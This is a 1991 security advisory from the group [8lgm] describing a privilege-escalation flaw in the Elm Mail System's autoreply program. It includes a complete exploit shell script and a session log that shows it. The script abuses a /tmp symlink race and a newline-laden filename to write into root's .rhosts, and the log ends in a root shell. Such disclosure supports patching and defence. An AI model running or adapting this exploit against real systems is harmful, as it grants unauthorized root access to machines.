8lgm-02.txt
da5777f162405336923a5ac3fca2ce61e44c36ddcf02a7986e9f0cdda1f9efb7
This advisory has been sent to:
comp.security.unix
INFOHAX <infohax-emergency@stormking.com>
BUGTRAQ <chasin@crimelab.com>
CERT/CC <cert@cert.org>
Elm Maintainers <elm@DSI.COM>
===========================================================================
[8lgm]-Advisory-2.UNIX.autoreply.12-Jul-1991
PROGRAM:
autoreply(1) (/usr/local/bin/autoreply)
Supplied with the Elm Mail System
VULNERABLE OS's:
Any system with a standard installation of The Elm Mail System.
All versions are believed to have this vulnerability.
DESCRIPTION:
autoreply(1) can be used to create root owned files, with mode
666. It can also overwrite any file with semi user-controlled
data.
IMPACT:
Any user with access to autoreply(1) can alter system files and
thus become root.
REPEAT BY:
This example demonstrates how to become root on most affected
machines by modifying root's .rhosts file. Please do not do
this unless you have permission.
Create the following script, 'fixrhosts':
8<--------------------------- cut here ----------------------------
#!/bin/sh
#
# fixrhosts rhosts-file user machine
#
if [ $# -ne 3 ]; then
echo "Usage: `basename $0` rhosts-file user machine"
exit 1
fi
RHOSTS="$1"
USERNAME="$2"
MACHINE="$3"
cd $HOME
echo x > "a
$MACHINE $USERNAME
b"
umask 022
autoreply "a
$MACHINE $USERNAME
b"
cat > /tmp/.rhosts.sh.$$ << 'EOF'
ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
exec autoreply off
exit 0
EOF
/bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
rm -f /tmp/.rhosts.sh.$$ "a
$MACHINE $USERNAME
b"
exit 0
8<--------------------------- cut here ----------------------------
(Lines marked with > represent user input)
> % id
uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % ./fixrhosts ~root/.rhosts 8lgm localhost
You've been added to the autoreply system.
You've been removed from the autoreply table.
> % rsh localhost -l root csh -i
Warning: no access to tty.
Thus no job control in this shell.
#
FIX:
1. Disable autoreply.
2. Wait for a patch from the Elm maintainers.
FEEDBACK AND CONTACT INFORMATION:
8lgm-bugs@bagpuss.demon.co.uk (To report security flaws)
8lgm-request@bagpuss.demon.co.uk (Request for [8lgm] Advisories)
8lgm@bagpuss.demon.co.uk (General enquiries)
System Administrators are encouraged to contact us for any
other information they may require about the problems described
in this advisory.
We welcome reports about which platforms this flaw does or does
not exist on.
===========================================================================